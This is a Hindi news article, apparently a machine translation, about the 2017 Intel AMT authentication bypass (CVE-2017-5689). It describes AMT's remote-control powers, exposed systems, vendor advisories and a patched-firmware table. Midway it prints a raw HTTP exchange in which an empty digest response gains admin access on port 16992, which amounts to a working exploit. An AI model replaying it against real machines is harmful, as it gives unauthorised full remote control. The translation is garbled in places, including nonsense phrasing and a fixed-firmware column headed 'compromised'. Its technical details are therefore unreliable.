👮 🤹 💃🏼 इंटेल AMT में भेद्यता उनके विचार से अधिक गंभीर निकली 🔰 🚈 ⏮️

1 मई, 2017 को, इंटेल ने सक्रिय प्रबंधन प्रौद्योगिकी (एएमटी) (INTEL-SA-00075 भेद्यता, जिसे CVE-2017-5689 के रूप में भी जाना जाता है ) में एक महत्वपूर्ण भेद्यता की घोषणा की। एंबी से मैक्सिम मालुटिन द्वारा भेद्यता पाई गई , लेकिन आधिकारिक घोषणा तक इंटेल के अनुरोध पर इसे गुप्त रखा गया।

इंटेल एएमटी एक हार्डवेयर तकनीक है जो कंप्यूटर की सेटिंग्स और सुरक्षा का प्रबंधन करने के लिए रिमोट (और एक स्वतंत्र सहायक टीसीपी / आईपी चैनल के माध्यम से) प्रदान करती है, भले ही बिजली की स्थिति (रिमोट / ऑन / रिमोट कंप्यूटर) और ओएस राज्य की परवाह किए बिना। तकनीक को चिपसेट में एकीकृत किया गया है। यदि आप इसे रैम और पीसी ड्राइव को स्कैन करने के लिए एक एंटी-रूटकिट के रूप में उपयोग करते हैं, तो ऐसी सुरक्षा को दरकिनार करने का कोई तरीका नहीं है। इससे भी बदतर, दूरस्थ AMT अनुरोध लॉग नहीं हैं।

अब खुले AMT पोर्ट के साथ 8500 से अधिक सिस्टम द्वारा Shodan का अनुरोध जारी किया जाता है। कुछ BIOS फर्मवेयर के लिए, पैच अभी तक जारी नहीं किए गए हैं जो एएमटी में बग को ठीक करते हैं।

एएमटी तकनीक सिस्टम प्रशासक को सिस्टम में विभिन्न क्रियाओं को दूरस्थ रूप से करने की अनुमति देती है: कंप्यूटर बंद करें, बूटलोडर कोड बदलें, इनपुट उपकरणों को नियंत्रित करें, निष्पादन योग्य कार्यक्रम इत्यादि वास्तव में, एएमटी आपको उन सभी कार्यों को दूरस्थ रूप से करने की अनुमति देता है जो आप कर सकते हैं। पीसी तक भौतिक पहुँच होना।

प्रौद्योगिकी के वर्णन को पढ़ने के बाद, आप कल्पना करना शुरू कर सकते हैं कि एएमटी तकनीक के साथ एक बंद कंप्यूटर में रिमोट एक्सेस होने से किसी हैकर को क्या अवसर मिलते हैं। तो, आपकी कल्पनाएँ सच निकलीं । एएमटी का रिमोट एक्सेस एक ब्राउज़र में एक वेब इंटरफेस के माध्यम से प्रदान किया जाता है। जैसा कि मैक्सिम को पता चला है, कोई भी क्रिप्टोग्राफिक हैश या कोई भी बिल्कुल भी डाइजेस्ट ऑथेंटिकेशन के लिए उपयुक्त नहीं है। यही है, प्राधिकरण फॉर्म में संबंधित क्षेत्र को आम तौर पर खाली छोड़ा जा सकता है।

यह एक पिछले दरवाजे की तरह भी नहीं दिखता है, क्योंकि इस तरह के अनाड़ी तरीके से कौन इसे लागू करेगा?

2010-2011 रिलीज़ (कमजोर फर्मवेयर की सूची, नीचे देखें) के बाद कमजोर सिस्टम। यह 100% आरसीई नहीं है, बल्कि एक तार्किक भेद्यता है। मैक्सिम माल्युटिन का मानना है कि कई हमले वैक्टर हैं, कैसे एक हमलावर इस भेद्यता का फायदा उठा सकता है, संभवतः इंटेल एएमटी समर्थन के बिना इंटेल सिस्टम पर भी।

"प्रमाणीकरण अभी भी काम करता है, " मालुटिन ने समझाया । "हमें इसके चारों ओर एक रास्ता मिला।"

एक वेब ब्राउज़र के माध्यम से, आप एएमटी कार्यों के लिए पूर्ण पहुंच प्राप्त कर सकते हैं, जैसे कि आप सिस्टम में व्यवस्थापक पासवर्ड को पहचानते हैं। 127.0.0.1:16992 पर स्थानीय प्रॉक्सी का उपयोग करने का तरीका यहां बताया गया है:

GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth" Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c" HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6

जानकारी के प्रकटीकरण के कुछ दिनों बाद, टेंटैक्ट ने एएमटी विशेषाधिकारों में वृद्धि के साथ एक महत्वपूर्ण भेद्यता का दोहन करने के लिए एक शोषण जारी किया । कंपनी ने अपने नेटवर्क पर कमजोर प्रणालियों का पता लगाने के लिए इस उपकरण का उपयोग करने का सुझाव दिया। ताकि सिस्टम एडमिनिस्ट्रेटर को पता चले कि नए फर्मवेयर वर्जन कहां इंस्टॉल करने हैं। शोषण को नेसस प्लगइन के रूप में लागू किया गया है।

उसी दिन, सर्वर और व्यक्तिगत कंप्यूटरों के सबसे बड़े निर्माताओं ने अपने ग्राहकों के लिए आधिकारिक सुरक्षा संदेश जारी किए: एचपी का एक संदेश , डेल का , लेनोवो का , फ़ुजित्सु का । असुरक्षित फर्मवेयर के बारे में विस्तृत जानकारी होगी और अद्यतन संस्करणों के लिंक उपलब्ध होते ही दिखाई देंगे।

इंटेल से पैच फर्मवेयर की सूची

कमजोर संस्करण फर्मवेयर	पर्याप्त सीपीयू पीढ़ी	समझौता फर्मवेयर
6.0.xx.xxxx	1 ^सेंट कोर	6.2.61.3535
6.1.xx.xxxx		6.2.61.3535
6.2.xx.xxxx		6.2.61.3535
7.0.xx.xxxx	2 ^{एन डी} जनरल कोर	7.1.91.3272
7.1.xx.xxxx	2 ^{एन डी} जनरल कोर	7.1.91.3272
8.0.xx.xxxx	3 ^आरडी जनरल कोर	8.1.71.3608
8.1.xx.xxxx	3 ^आरडी जनरल कोर	8.1.71.3608
9.0.xx.xxxx	4 ^वें जनरल कोर	9.1.41.3024
9.1.xx.xxxx		9.1.41.3024
9.5.xx.xxxx		9.5.61.3012
10.0.xx.xxxx	5 ^वें जनरल कोर	10.0.55.3000
11.0.xx.xxxx	6 ^वें जनरल कोर	11.0.25.3001 11.0.22.3001 11.0.18.3003
11.5.xx.xxxx	7 ^वें जनरल कोर	11.6.27.3264
11.6.xx.xxxx	7 ^वें जनरल कोर	11.6.27.3264 11.6.12.3202

इंटेल ने विंडोज 7/10 के तहत कमजोरियों के लिए सिस्टम की जांच के लिए एक आधिकारिक टूल जारी किया है, साथ ही इसके उपयोग के लिए एक गाइड भी है।

इंटेल AMT में भेद्यता उनके विचार से अधिक गंभीर निकली

More articles: